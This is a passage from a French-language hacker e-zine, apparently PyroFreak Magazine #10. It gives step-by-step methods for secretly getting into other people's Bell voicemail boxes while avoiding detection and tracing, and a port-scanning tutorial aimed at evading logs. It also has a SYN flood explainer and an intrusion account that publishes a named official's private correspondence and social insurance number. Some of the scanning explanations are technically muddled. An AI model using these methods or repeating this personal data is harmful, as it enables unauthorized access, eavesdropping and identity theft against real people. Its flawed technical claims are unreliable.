Deux possibilités s'offrent à vous.

Si vous possédez vous même un service TéléRéponse, vous n'avez qu'à
faire la procédure habituel pour vous connecter à votre Boîte Vocale (*98).
Vous allez entendre la phrase suivante: " 'Votre Nom D'usager' veuiller
composer votre mot de passe, ou encore appuyer sur '*', si vous avez
composé le mauvais numéro de Boîte Vocale". Quand vous entendez cette phrase,
vous tappez sur '*', à ce point vous allez entendre: "Le numéro de la Boîte
Vocale Svp". C'est a ce moment que vous composez le numéro de la Boîte Vocale
de votre cible, qui est le code régional suivi du numéro de téléphone
(XXX-XXX-XXXX). Une fois le numéro de la Boîte Vocale composé, vous allez
réentendre le message d'origine: "'Nom D'usager de la cible' veuiller
composer votre mot de passe" . Quand vous êtes rendu à ce point, vous pouvez
encore vous débrancher de la Boîte Vocale que vous êtes en tappant sur '*',
mais une fois que vous avez composer un mot de passe, vous ne pouvez plus
changer de Boîte Vocale. En tappant sur '*' ca vous déconnecte automati-
quement du système.


Si vous possèdez pas de service TéléRéponse, heh bien j'ai un moyen
pour vous qui est quand même efficace, mais ca vous demande un petit effort.
Vous devez trouver un numéro de téléphone d'une résidence ou d'une entreprise
muni du service Téléréponse et que son propriétaire est absent, et vous
tapper '*' durant le message d'intro. Pour plus d'Information, aller revoir
la parti *Les Étapes pour accéder au menu à partir d'un autre Boîte Vocale*
un peu plus haut dans ce document. Après 17 heure, c'est assez facile à
trouvé vu que les entreprises ferment vers cette heure la.

Donc, avec les 2 méthodes que je viens de vous décrire, vous pouvez
hacker la Boîte Vocale TéléRéponse à l'insus de son propriétaire, meme si
celui ci est à coter de celle-ci.


*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*
*+ 5- Menu d'une Boîte Vocale du Service TéléRéponse +*
*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*


Menu de la personne qui envois un message sur une Boîte Vocale TéléRéponse
('#' apres le message enregistré)

1-Si vous etes satisfait de votre message
1-Pour envoyer votre message en mode de transmission normal
2-Pour envoyer votre message en mode de transmission urgent
2-Pour entendre votre message
3-Pour effacer et enregistrer de nouveau
4-Poursuivre l'enregistrement à partir de l'endroit ou vous vous étiez arrêter




Menu de la Boîte Vocale Téléréponse

11- Pour écouter les messages non entendus
6-Faire parvenir une copie à quelqu'un, accompagné de vos remarques
0-option
1-Privé
2-Urgent
3-Confirmation
4-transmission différé
1-Pour indiquer la date
#-Pour envoyer le message des maintenants
*-Pour annulé
7-Effacer le message
8-Pour y répondre
0-option
1-Privé
2-Urgent
3-Confirmation
4-transmission différé
1-Pour indiquer la date
#-Pour envoyer le message des maintenants
*-Pour annulé
9-Sauvegarder le message
#-Pour sauter le message
1- Pour écouter vos messages
2- Pour envoyer un message
0-option
1-Privé
2-Urgent
3-Confirmation
4-transmission différé
1-Pour indiquer la date
#-Pour envoyer le message des maintenants
*-Pour annulé cet destination
3- Pour repéré un message
4- Modifier vos Options personnels
1-Activé ou désactivé Avis de message
3-Pour activé
4-Pour la désactiver
*-Pour quitter
#-Confirmer
*-Annuler
2-Modifier les options de gestions
1-Pour contrôler les mots de passe
2-Pour établir ou modifier des listes de distribution de groupe
3-Pour changer les niveau de message guide
1-Pour entendre les messages guide normaux
2-Pour entendre les messages guide détaillés
3-Pour entendre les messages guide brefs
4-Modifier l'option date et heure
1-Pour activé l'option Date et Heure
2-Pour désactivé l'option Date et Heure
*-Retour au menu précédent
3-Pour enregistrer des messages d'accueil
1-Pour modifier votre message d'accueil personnel
3-Pour modifier votre nom pré-enregistré
*-Pour quitter (Retour au menu précédent)
*-Rompre la communication



Les choses à retenir de ce menu, c'est que '*' sert toujours à
retourner au menu précédent lorsque vous êtes pas dans le menu principal, et
le '#' est pour confirmer une action.



*+*+*+*+*+*+*+*+*
*+ 6- Conseils +*
*+*+*+*+*+*+*+*+*

Quand vous appeler un service de TéléRéponse, je vous conseil FOR-
TEMENT de faire *67 (Numéro Confidentiel), c'est gratuit et c'est pas
beaucoup plus long a faire. Et vous éliminer les chances de vous faire
achaler par l'entreprise ou l'individu en question.

Quand vous rendez visite à une Boîte Vocale TéléRéponse, essayer
de pas laisser de trace. Ce que je veux dire pas la, c'est que exemple
sur la Boîte Vocale en question il y a quelques nouveaux messages, et vous
avez le goût de les écouter. Mais il a un probleme. Comment laisser la
mention nouveau message, sinon l'opérateur de la Boîte Vocale va trouver
ca bizzare que la mention ne soit pas dit, et surtout que les messages
sont rendu dans les archives ou éffacés. C'est pourquoi j'ai la solution à
votre probleme. Quand vous écoutez les messages, vous n'avez qu'à appuyer
sur '#' pour sauter au message suivant. Et miracle, la mention nouveau
message reste.

Je vous conseil de hacker un service TéléRéponse à partir d'une
cabine Téléphonique. Comme ça, vous éliminez quasi totalement les risques
de vous faire buster (Même que si les risques sont vraiment minible, vu que
ce n'est pas un délit très grâve). Mais, pour ce qui est du crackage du mot
de passe, vous pouvez le faire de chez vous. Parce que si vous changez rien
à la configuration du système TéléRéponse, personne va le savoir que vous
avez trouvé le mot de passe.



Bon, maintenant pour ce qui est du 0,25$ que ca coute pour appeler
à partir de la Cabine ou du long distance a partir de chez vous, il a une
solution pour éliminer cela, qui est légal à 100%. Saviez vous que les
1-800 ou 1-888 sont gratuit a partir d'une cabine téléphonique et surtout
ne coûte aucun long distance. Heh bien oui, donc vous appeler un 1-800 ou
un 1-888 qui possède un service TéléRéponse, et vous suivez les procédures
que j'ai dis dans le chapitre *Les Étapes pour accéder au menu à partir d'un
autre Boîte Vocale*.

Donc, vous pouvez accéder à une Boîte Vocale TéléRéponse gratuitement
à partir d'une cabine, et vous avez encore moins de chance de vous faire
retracer, vu que c'est comme un transfert de box. Et aussi vous pouvez hacker
n'importe quel Boîte Vocale TéléRéponse, même si elle est à l'autre bout du
Québec, vu qui à pas de long distance.

Et pour le monde qui lisent entre les lignes, ca veux aussi dire que
vous pouvez laisser un message sur Le téléréponse a quelqu'un a partir d'une
cabine téléphonique, sans que ca vous coûte une cent. Donc profiter en.
Je vous aurais bien donner une liste de 1-800 avec TéléRéponse, mais j'en
ai pas assez pour le moment, et je tiens à garder ceux que j'ai le plus
longtemps possible. C'est pourquoi si j'en trouve d'autres, je vais les
rajouter dans une prochaine version de ce document.

NB: La boite Vocale 1-800 doit se trouver à l'origine dans le meme exchange
(450,514,819,418)

*+*+*+*+*+*+*+*+*+*
*+ 7- CONCLUSION +*
*+*+*+*+*+*+*+*+*+*

Pour conclure, si vous avez bien compris çe document, vous êtes
supérieur à plusieurs Vendeurs de produits Bell Canada en matière de
connaisance des TéléRéponses. Y connaissent rien les CRIS!


À venir: Tutorial sur les TéléRéponse Plus et Tutorial sur les
systemes Centrex. VIVE LE QUÉBEC!!!

J'aimerais souligner la collaboration de Bell Canada envers ce document.

Salut


____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
|3-L'utopie du portscan
|( ) Phreak (X) Hack ( ) Autres
'.__________Par LeMarquis________ ________ lemarquiz@yahoo.com ______ ___

Le port scan est une activité essentielle pour toute tentative
d'intrusion. Connaître les services présents sur un serveur est primordial
pour pouvoir en abuser. Cependant les vieilles techniques de portscan sont
devenues désuètes avec l'arrivée de programme complexe qui analyse le trafic
internet (logger). Je vous ferai part des techniques élémentaires de
portscan ainsi que des nouvelles techniques plus difficiles à détecter. Je me
concenterai sur les TCP portscan et je laisserais de coté les UDP et les ICMP
scans. Les TCP portscans se divisent en 3 catégories : les scans simples,
ceux qui se font sans proxy, les bounces scan, ceux qui utilisent un proxy et
le scan complexe, qui utilise un proxy + des spoofs packets (source
modifiée). Dans mes schémas, j'utiliserai le nom de CIBLE pour l'IP à scanner
et EVIL pour notre propre IP. Le caractère stealth représente la faculté qu'à
un type de scan de n'être pas détecté.



------========------------------------------=-=-=----
-+-+-Scans simples-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
------========-----------------------------------------=-=-=----


1-TCP Connect():
Vitesse: Très rapide Stealth: Faible
Ceci est le type de scan le plus simple. Ce n'est que la demande classique et
légitime de connexion sur un port de notre cible. N'importe quel user sur un
serveur unix, a accès à ce type de scan. C'est le TCP connect qui est
utiliser dans le programme unix strobes qui a l'avantage de scanner seulement
les ports de votre /etc/services, ceux des services connus. Le fort
désavantage de ce type est le niveau de stealth très mauvais. Les fichiers de
log des programme qui gèrent les services, vont tous noter l'IP d'EVIL.



EVIL CIBLE
SYN ---->
<---- SYN|ACK
SYN|ACK ---->


2-TCP SYN scanning:
Vitesse: Rapide Stealth: Moyen
Surnommé le 'half-open' scan, ou le demi-scan. Nous ne faisons ici pas un
connexion complètement. Nous envoyons d'abord un SYN à la cible. Si son port
est ouvert elle nous renvoie un SYN|ACK. Immédiatement après que l'on reçoive
son packet, nous lui envoyons un RST qui annule la demande de connexion.
L'avantage de cette technique est que plusieurs OS ne la détecteront pas.



EVIL CIBLE
SYN ---->
<---- SYN|ACK
RST ---->


3-TCP FIN scanning:
Vitesse: Moyenne Stealth: Moyen
Le TCP SYN scan n'est cependant pas parfait, certain firewall et packet
filter bloquent les FIN packets. De plus plusieurs loggeurs réussissent à
détecter ce scan. Il nous reste à utiliser des FIN packets au lieu de nos RST
packets utilisés précédemment. L'envoie d'un FIN dit à la cible de ne plus
envoyer d'autres packets. Certain OS ont contrairement tendance à envoyer un
RST packet ce qui annule l'effet stealth. Tout ceux tournant sur Microsoft ne
sont pas vulnérable, sauf que la plupart des autres le sont.



EVIL CIBLE
SYN ---->
<---- SYN|ACK
FIN ---->


------========------------------------------=-=-=----
-+-+-Bounce scan-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
------========-----------------------------------------=-=-=----

*
4-FTP bounce attack:
Vitesse: Lente Stealth: Fort
Un vieux bug dans le protocole FTP permet d'effectuer des portscans a même
une session ftp. Il s'agit d'utiliser la command PORT sur un ftp. Le PORT
tentera de se connecter sur notre cible au port que l'on veut vérifier.
Ensuite avec la commande LIST, le ftp envoiera le contenu du répertoire
courant dans le port de notre cible. Le commande répondra soit par "transfer
will be successful" si le port est ouvert, sinon par "425 Can't build data
connection: Connection refused." si le port est fermer. Ce bug vient du fait
que nous pouvons établir une connexion proxy sur un ftp. Il faut noter que
les serveur ftp récents enlèvent la possibilité d'un proxy. Ce type de scan
cache presque complètement la trace d'un portscan venant de votre IP. Le ftp
serveur garde toujours un log de toutes vos demandes de proxy. Votre scan
reste en log sur le ftp pour un certains nombres de jours.



EVIL FTP CIBLE
<--session-->
PORT ----> SYN --->
LIST ---->
<---- RESULT


5-SOCKS bounce:
Vitesse: Lente Stealth: Fort
Les socks serveurs sont des redirecteurs souvent présents sur des wingates au
port 1080. On peut se connecter sur un autre serveur en partant de ces socks.
On peut donc faire un portscan avec le socks. Semblable au FTP bounce, nous
ferons un scan avec notre socks qui essayera de se connecter sur les port de
notre cible. Le socks fera un TCP Connect() sur la cible et sera peut-être
logger sur notre cible. Tout comme le FTP bounce nous pouvons être retracer
par les logs du wingate gérant le socks.



EVIL SOCKS CIBLE
<--connexion-> SYN ----->
<-------- RESULT

6-Web proxy scan:
Vitesse: Lente Stealth: Fort
Les web proxy, qui sont courant sur le net, peuvent aussi servir de
redirecteur pour nos scan. Avec une bounce, on peut demander à notre web
proxy de se connecter sur la page web fictive de notre cible à un certain
port. Le web proxy nous dira comme réponse s'il a bien réussi à se connecter
et qu'il n'a pas pu avoir le contenu web (surprenant!). Cependant de nombreux
web proxy n'acceptent seulement de se connecter sur les pages web ayant comme
port 80 ou 8080. De plus, il faut faire attention à ne pas prendre de web
proxy qui sont publique car ceux-ci renvoient votre IP en "forward" quand ils
réussissent à se connecter sur un port de notre cible. La grosse lacune de ce
scan est que les réponses des web proxy sont rarement les mêmes d'un proxy à
l'autre. Certains proxy ne veulent tout simplement pas nous dire s'ils ont
réussi à se connecter. Ce bounce utilise le web proxy pour scanner la cible
et comme pour tout les bounces, le proxy conserve encore les précieux logs de
notre scan.


EVIL PROXY CIBLE
<--connexion-->
GET CIBLE:PORT --> SYN -->
<-- RESULT


------========------------------------------=-=-=----
-+-+-Scan complexe-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
------========-----------------------------------------=-=-=----


7-Idlescan:
Vitesse: Très lente Stealth: Très fort
Le idlescan est le dernier né des portscans. Il est très complexe mais
quasiment indétectable. Il utilise le nombre "ip.id" qui se trouve sur chaque
TCP packet. Ce ID monte d'une unité à chaque packets envoyés, nous pouvons
alors deviner le nombre de packet envoyés par un certain IP pendant un
certain temps. Si l'on envoie un SYN sur un port fermer, l'ID de notre packet
augmentera d'une unité, tandis que si le port est fermé le ID restera le
même.

Port fermé:
EVIL CIBLE
SYN ---->
<---- SYN|ACK
ID + 1

Port ouvert:
EVIL CIBLE
SYN ---->
<---- RST
ID

Ce qui nous amène à utiliser des IP sans trafic qu'on n'appellera des
senseurs. Ils peuvent être soit des routeurs ou des imprimantes. Ceux-ci ne
doivent absolument pas avoir de trafic de packet car cela changera leur
numéro de ID. Premièrement, nous regardons le ID de notre senseur. Ensuite
nous envoyons un SYN spoof packet (source modifié) sur notre cible avec comme
source notre senseur. Finalement, nous trouvons le nouveau ID de notre
senseur. La cible recevra le SYN packet, voyant qu'il a comme source notre
senseur, il envoiera sa réponse à notre senseurs. Si le ID du senseur a
augmenté, le port de la cible est fermé, si il reste le même alors le port
est ouvert.


Port ouvert:
EVIL CIBLE Senseur
(senseur) SYN ---->
SYN|ACK ---> ID+1

Port fermer:
EVIL CIBLE Senseur
(senseur) SYN ---->
RST ---> ID

Voici enfin cette technique. Elle est presque 100% indétectable. Notre spoof
packet envoyé sur la cible ne peut pas être retracer et notre vérification du
numéro de ID du senseur n'est pas logger. Le scan semble venir du senseur
avec un TCP connect, mais le senseur ne log rien. Cette méthode étant très
récente et complexe, elle demeure très lente. Un de ces désavantages est de
trouver de bons senseurs. Avec plusieurs, nous pouvons augmenter la vitesse
du scan.


8-Fragmentation:
Ce n'est pas précisément un autre technique de scan mais plutôt une
modification que l'on peut faire sur chaques scan (en excluant les bounces et
le idlescan). Au lieu d'utiliser des TCP packets complets, nous utilisons des
packets divisés. Ce qui rend la vie des logger et des filtres de packet
difficile. De nombreux crash quand il reçoivent ce type de packet. Par
contre, nous ne pouvons utiliser ce type de packet sur certaine cible qui ont
un firewall qui bloque tous les packet fragmentés.



Finalement, pratiquement tout ces scans nécessitent un accès root sur
un serveur unix. Les types accessibles à un user ou à un windows user est le
TCP Connect() et les bounces scan. Cependant, les programmes de scan sur
windows sont moins diversifiés. Ils sont condamner a utiliser des types de
scan peu sophistiqué. Chaques scan a ses avantages, aucun n'est parfait. La
vitesse et le niveau de détectabilité sont deux qualités très importantes.
Pour ce qui est des bounce scan, la facilité à trouver un proxy est aussi un
avantage. Je ne vous cacherai pas ma préférence pour le TCP SYN scan pour les
fast et assez stealth scan. J'ai aussi une grande admiration devant les
merveilles du idlescan, ce scan carrément utopique. Chaqu'un à sa préférence
sur un type de scan, et les goûts ne se discutent pas...


------========-----------------------------------------=-=-=----

[ Programmes pour le scan ]

Les windows portscanner et strobes ; Revelation
1-TCP Connect()

Nmap Fyodor's Stealth Port Scanner ; http://www.insecure.org/nmap/
1-TCP Connect()
2-TCP SYN scanning
3-TCP FIN scanning
4-FTP bounce attack
8-Fragmentation

Socks Scan V 2.0 by ICEHOUSE ; sos.tgz
5-SOCKS bounce

Proxy Bounce Scanner ; pbs.c
6-Web proxy scan

idlescan v0.1-alpha3 by LiquidK ; idlescan-v0.1-alpha3.tgz
7-Idlescan

------========------------------------------=-=-=----

References:
Phrack 51 Fyodor Article - http://www.insecure.org/nmap/p51-11.txt
BugTraq Linux blind TCP spoofing - http://www.securityfocus.com/
Liste de Web proxy et de socks - http://proxys4all.cgi.net/
Idlescan README


____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 4-Le SYN flooding
|( ) Phreak (X) Hack ( ) Autres
'.__________Par Endrix________ ________ lordendrix@hotmail.com____ ___


Introduction:
¯¯¯¯¯¯¯¯¯¯¯¯¯
Bon la chu tannez de recevoir des emailz pour me demander comment faire
un flood SYN. Alors la je vais vous dire comment ca marche et non comment
le faire parce que nos amis(es) de la GRC n'ont pas l'air d'aimer ca.


Explication:
¯¯¯¯¯¯¯¯¯¯¯¯
Le principe est assez simple : une machine A envoie à une machine B un
paquet SYN semblant venir d'une machine X non accessible éteinte ou
qui n'existe tout simplemement pas. La machine B envoie donc le second
paquet pour l'ouverture de la connection et attend la réponse de la
machine X, qui ne viendra jamais.

Ainsi, la machine B aura une connection monopolisée pendant un certain
laps de temps. Si la machine A envoie de nombreux paquets SYN, la
machine B peut devenir saturée et ne plus accepter de nouvelles
connections. Cette attaque fait donc partie des attaques du type refus
de service, puisque la machine cible devient indisponible et refuse
ainsi un service à d'autres utilisateurs.

Plusieurs erreurs possibles:

-> Unreachable host
-> Reset
-> Time Exceeded


Conclusion:
¯¯¯¯¯¯¯¯¯¯¯
Bon, j'ai au umpeu d'aide pour les expressions dans ce texte mais dans
l'ensemble j'espère que vous avez compris comment marche le packet SYN
et j'espère que vous allez arrêter de m'envoyer des emailz demandant
de l'aide à ce sujet.



n.b. Ceci est pour la GRC : "Essayez de trouver quelque chose d'illégal
dans ce texte bande d'enfoiré :)"





____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 5-Certains code régionaux de Bell&Cantel
|(X) Phreak ( ) Hack ( ) Autres
'.__________Par Endrix________ ________ fbasoft@yahoo.com ______ ___


Voici les codes régionnals pour les pagettes et cellulaires dans la région
de Montréal (514)
===========================================================================

Cellulaire Bell: 212 213 214 217 221 231 232 233 234 235 236 237 238 239
249 304 306 386 404 592 709 786 869 891 893 894 895 910
912 913 914 915 916 917 918 919 920 929 942 943 946 949
951 953 955 957 978 980 984
Pagette Bell: 201 202 203 204 230 301 361 404 407 408 423 440 517 520 521
580 719 837 851 853 857 859 869 879 896 921 960
Cellulaire Cantel: 240 241 242 243 244 262 497 501 591 594 726 758 781 823
824 825 826 857 862 865 867 880 892 898 909 924 927 928
941 944 945 947 952 975 979 983
Pagette Cantel: 201 290 361 402 801 854 930 936
Clearnet Mike: 820 821 829 832 863 977
Clearnet PCS: 805 808 816 817 830 831
Cellulaire Microcell: 570 571 572 573 574 575 576 577 578 803 812 813 814
815 992 993 994 995 996 998 999


Voici les différents codes de Montréal
======================================

(514)
205 215 223 251 252 253 254 255 256 257 259 270 271 272 273 274 275 276
277 278 279 280 281 282 283 284 285 286 287 288 289 302 312 321 322 323
324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341
342 343 344 345 350 351 352 353 354 355 356 362 363 364 365 366 367 368
369 370 374 376 380 381 382 383 384 385 387 388 389 390 391 392 393 394
395 396 397 398 399 406 448 480 481 482 483 484 485 486 487 488 489 490
493 494 495 496 497 498 499 502 522 523 524 525 526 527 528 529 530 540
590 591 593 594 595 596 597 598 599 640 642 643 644 645 648 650 667 673
720 721 722 723 724 725 727 728 729 731 732 733 734 735 736 737 738 739
740 741 744 745 747 748 749 751 760 761 762 765 766 767 768 769 790 801
807 818 823 840 841 842 843 844 845 846 847 848 849 850 852 855 856 858
860 861 864 866 868 870 871 872 873 874 875 876 877 878 881 888 890 897
899 906 907 908 925 926 927 931 932 933 934 935 937 938 939 940 948 954
956 981 982 983 985 986 987 988 989 990 991 992 993 997


Voici les codes régionnals pour les pagettes et cellulaires dans la région
de Ottawa (613)
====================================================================================

Cellulaire Bell: 290 292 293 299 612 720 724 725 761 791 794 795 798 850 859
Cellulaire Cantel: 240 286 291 302 762 769 796 797 799 851 852 862
Pagette Cantel: 220 239 364 560 566 597 751 780 786 787
Clearnet Mike: 223
Clearnet PCS: 266 277 282 325
Clearnet: 229
Cellulaire Microcell: 261 262 265 276
Cellulaire: 719


Voici les différents codes de Ottawa
====================================

(613)
224 225 226 228 230 231 232 233 234 235 236 237 238 239 241 244 245 247 248
249 260 274 298 350 364 368 520 521 523 526 560 562 563 564 565 566 567 569
580 581 593 594 596 597 598 660 688 719 721 722 723 724 725 726 727 728 729
730 731 733 734 736 737 738 739 740 741 742 744 745 746 747 748 749 750 751
755 759 760 761 763 765 768 780 781 782 783 784 785 786 787 788 789 792 798
820 828 829 842 844 860 863 940 941 943 944 945 946 947 951 952 954 957 990
991 992 993 995 996 998


Voici les codes régionnals pour les pagettes et cellulaires dans la région
de Hull (819)
==================================================================================


Cellulaire Bell: 664 712 773 775 790
Cellulaire Cantel: 743 773 921 923
Pagette Cantel: 772 773
Clearnet Mike: 955
Cellulaire Microcell: 328 329



Voici les différents codes de Hull
====================================
(819)
243 246 328 420 503 561 568 595 770 771 772 775 776 777 778 779 790 920 953
955 956 994 997




____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 6-La GRC introduite par un anonyme
|( ) Phreak (X) Hack ( ) Autres
'.__________Par LeMarquis________ ________ lemarquiz@yahoo.com ______ ___


Est-ce qu'il n'existe pas de cible plus symbolique que la GRC pour
nous, jeunes rebelles des temps modernes. Mais qu'est-ce que la GRC a de si
spéciale ? Elle est a d'abord su appliquer la loi qu'on utilise pour
les tuer et violeur sur de jeunes curieux explorant les réseaux informatique
et téléphonique. Elle a de plus harceler un grand nombre d'entre eux. Il
s'agit de voir un peu l'histoire du underground québécois pour voir qu'il est
jaillionné de bust de cette police fédérale. Le prestigieux groupe NPC a
lui-même été la victime d'attaque de ces pseudo-justicier. Le fait que les
agents fédéraux gagne plus de 60 000$ n'arrive pas a suscite ma colère mais
le fait qu'il ose encore chialer contre leur supposé condition de travail
difficile ou il risque chaque jours leur vie me rend dangereusement violent.
Certain croiront que je ne fais que répéter de vulgaire préjugé. Je vous
donnerai la preuve concrète dans ce même article.


Tout a commencer lorsque tard dans la nuit ou plutôt tard le matin,
je m'interessa avant de m'étendre au site officiel de la grc
(www.rcmp-grc.gc.ca). Ce site me paraissait intéressant sur son contenu sur
certaine loi concernant le fameux 'crime' informatique. Par simple curiosité
j'ai effectuer une panoplie de scan sur le serveur. Je porta en premier mon
attention sur le ftp service.

Banner du ftp:
------------------------------------------------------------------
Government of Canada / Gouvernement du Canada
-------------------------------------------------------------------
This server is owned and operated by the GTIS branch of the ministry
of Public Works and Government Services Canada (PWGSC). Ce serveur
(server) appartient et est opéré par les SGTI; un département du
ministère des Travaux publics et Services gouvernementaux Canada (TPSGC).
-------------------------------------------------------------------
WARNING / AVERTISSEMENT
UNAUTHORIZED ACCESS IS PROHIBITED UNDER SECTIONS 326, 342.1, & 430(1.1) OF
THE CRIMINAL CODE OF CANADA. VIOLATORS WILL BE PROSECUTED. L'ACCÈS SANS
AUTORISATION EST DÉFENDU EN VERTU DE LA SECTION 326, 342.1 OU 430 (1.1)
DU CODE CRIMINEL CANADIEN. TOUTE VIOLATION FERA L'OBJET DE

  
POURSUITES.
-------------------------------------------------------------------

Je suis prêt a gager que nombreux sont ceux qui ont sursauter en
voyant cette avertissement. Ils ont aussitôt fermer leur ordinateur et se
sont planquer en attendant les sirènes. Il est vrai que ce message est
quelque peu apeurant, ne seraisse que celui-ci permet un certain support
légale contre une poursuite. Il ajoute aussi que "TOUTE VIOLATION FERA
L'OBJET DE POURSUITES.", il faut cependant être très naïf pour croire a cette
partie du texte.

Avec les précaution nécessaire, j'ai essayer plusieurs login et
password par défaut sur le serveur. Je ne fut pas surpris de voir aucun
account présent. J'avais a faire a un site gouvernemental et même judiciaire.
Mais j'avais oublier l'account le plus courant et le plus inoffensif:
l'ANONYMOUS. Ce même username si utiliser dans les ftp publiques. Il est
parfois présent sur les serveur unix, mais nous laisse habituellement peu de
liberté, en nous restreignant dans certain directory sans accès d'écriture,
ni accès a de l'information priver du serveur.


Je n'en croyait pas mes yeux quand j'ai vu que le ftp s'ouvrait a moi
dans la vrai racine du serveur (/). Oui je n'était pas emprisonner dans des
directory vides sans importance. Je pouvais lire plusieurs directory et me
promener a ma guise dans l'ensemble des fichiers du serveur. On m'avait
retirer le droit d'écriture, je ne pouvait penser a modifier leur page web.


Carte au Trésor

-----------------------------------------------------------------


/ =========> departments/ ========> pwgsc/ ||
||
||
$$$$Grant's CD$$$$ <====== gwtrans/ <====


-----------------------------------------------------------------


Nous avons su avec le banner du début que le site était maintenu par
Public Works and Government Services Canada (PWGSC). On retrouve donc les
documents de ce ministère sur le serveur et malheureusement pas ceux de la
GRC. Avis a ceux qui croyait que la cia.gov habritait tout les documents
classer top secret. Nous avons donc ici les documents de travail de Grant.
Mais qui est ce Grant ? Grant Westcott est le Sous-ministre adjoint au
Services gouvernementaux de télécommunications et d'informatique (SGTI) et
aux Travaux publics et Services gouvernementaux Canada (TPSGC). Il est le
responsable de tout ce que le gouvernement prend comme décision au sujet des
services de télécommunications et d'informatique. Il est donc l'adminis-
trateur de l'ensemble des réseaux du gouvernement fédérale. Il semble aussi
proche du premier ministre Jean Chrétien qui est mentionné dans un grand
nombre de ces documents de travail.


Notre gouvernement fédérale est corrompu jusqu'à la moyelle. Après le
ministre des finances qui exploitait un compagnie de bateau au Canada. Mais
cette entreprise était enregistré dans un paradis fiscaux des Antilles, de
quoi sauvé beaucoup d'argent en impôt. Voici que notre l'admin informatique
Westcott imite celui-ci. Et oui, ce n'est après avoir consulter quelques
documents fédéraux sur le site de la GRC que l'on voit la magouille qui ce
joue a Ottawa. En voici la preuve :


/*
Canadian Offshore Financial Services
Suite 1869, Manulife Place,
10180 - 101 Street,
Edmonton, Alberta,
Canada
T5J 3S4


Dear Mr. Michael Ritter:


I would appreciate receiving further details on how one goes about
establishing residency and/or citizenship in Belize, the Bahamas, Malta,
Cayman, the Turks and Caicos or any other countries with favourable tax
policies for Canadian who are about to retire. In our circumstances, I am a
senior civil servant who is starting to plan for retirement and will be in
receipt of a pension of just under $80,000 per annum. In addition my wife
and I will have assets (RRSPs, equity and real estate) worth approximately $1
Million.
*/

Notre Westcott veux maintenant quitter le pays, et transféré sa
pension du gouvernement et ses avoirs personnel d'une valeur d'un millions de
dollar dans un de ces paradis fiscaux. Et choisira finalement dans une
seconde lettre le Belize. Il ne se contente pas seulement de quitter le pays
avec un million, il envoie aussi une lettre directement à Revenue Canada en
demandant une réduction d'impôt avec comme raison qu'il est aussi employer au
ministère de la Justice.


/*
Name: Grant Charles Westcott
S.I.N.: 434-153-599

Employer Justice Canada
2nd floor
LaSalle Building
Ottawa, Ontario
K1A 0H8
Attn: Connie Murray

This is a request to renew my deductions at source for calendar year 1998. I
am requesting a deduction of $7800/annum.
Thank you
Grant C. Westcott
*/

On voit là comment sa marche au gouvernement. Tout le monde se grasse
la patte entre eux. Après on entend dire par cette administration comment il
aime leur pays et comment il font leur possible pour son progret. Hypocrisie.
Ils ne nous s'agissait de faire un petite intrusion sur le site de la GRC
pour apprendre le contraire. Ce fut propablement l'intrusion la plus minable
jamais faite contre un site du gouvernement. Je vous dirai qu'elle est à
l'image de la GRC qui elle-même s'occupe de notre propre sécurité. On peut
faire un parallèle avec le ministère de la justice qui est supposé rendre
justice à la population et qui rend des avantages sociaux à certains requains
financiers. Il n'en demeure pas moins que les documents personnelles et de
travail sont encore disponible avec le ftp de la GRC. Quiconque veut
confirmer mes dires pourra en anonymous prendre les documents qu'il lui faut
en suivant la carte au trésor. Il faut noter que l'accès anonymous est
parfaitement légale car il est publique.


J'ai faite beaucoup de promenade sur les réseaux du gouvernement
provincial. Je peux vous dire que jamais je n'ai vu un seule document que je
trouvais louche. Avec le site de l'an 2000, je n'ai que fait exprimer mon
opinion sur le sujet du bug. Cependant après seulement une seule visite sur
un site fédéral je me retrouve avec plusieurs documents compromettant. Est-ce
un hasard ? J'en doute. En reprenant les mots d'un certain auteur de NPC " La
distance en ce monde attire la paperasse et depuis toujours elle est un
facteurs de corruption... " Quand l'on pense que certains ne veulent pas se
délaisser de cette plaie...


____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 7-Alladvantage
|( ) Phreak ( ) Hack (X) Autres
'._______Par [ewoks] & Svaik ___ ewoks@pyrofreak.org & svaik@biosys.net_

Qu'est ce que alladvantage:

All advantage est une compagnie américaine vous payant pour surfer
au tarif de 50 cents U.S. de l'heure c'est à dire environ 70 cents canadien.
Alladvantage existe depuis mars dernier, c'est une entreprise fiable qui a
distribuer pour le mois d'octobre 1999 plus de 30 chèques supérieurs a 1000$
(Il y a meme une personne qui a touché un cheque de plus de 4000$US).

Le grand plus de alladvantage est son système pyramidal permettant de
référencer des personnes sous vous. Vous recevrez $0.10 US pour chacune des
25 premières heures surfées par chaque personne que VOUS référencerez. -
Vous recevez $0.05 US pour chacune des 25 premières heures surfées par chacun
des référencés de vos référencés, et ce, jusqu'à 4 sous-niveaux :-) ATTENTION
: les heures de vos référencés vous sont payées seulement si vous faîtes
autant d'heures qu'eux. Si vous faîtes vos 25 heures pas de problèmes, mais
si vous ne faîtes que 15 heures par exemple, seules les 15 premières heures
de chacun de vos référencés vous seront payées. Alladvantage paye mensuel-
lement dès que le montant accumulé est de 20$(Ils envoient les chèques entre
le 20 et 30 de chaque mois). Le 3 novembre, AllAdvantage confirmait par
téléphone à l'émission "Branché" de Radio-Canada qu'elle commençait dès le
mois de novembre à payer ses abonnés au Québec.

Le petit problème de alladvantage au québec:
Pour le Québec, AllAdvantage ne distribue pas immédiatement la ViewBar, donc
vous ne commencez pas à faire de l'argent imméditament! Cependant, j'ai
découvert un truc pour que les gens du Québec puisse obtenir leur Viewbar
immédiatement lors de l'inscription, donc de faire de l'argent immédiatement!

La marche à suivre:
Pour ceux qui sont déja inscris où qui possède déja la viewbar veuillez vous
désabonner et effacer toute traces de la viewbar. Pour vous désabonner vous
n'avez qu'a allez sur le site web de AllAdvantage(alladvantage.com) vous
allez dans MY ACCOUNT vous allez la ->If you are already a member, and would
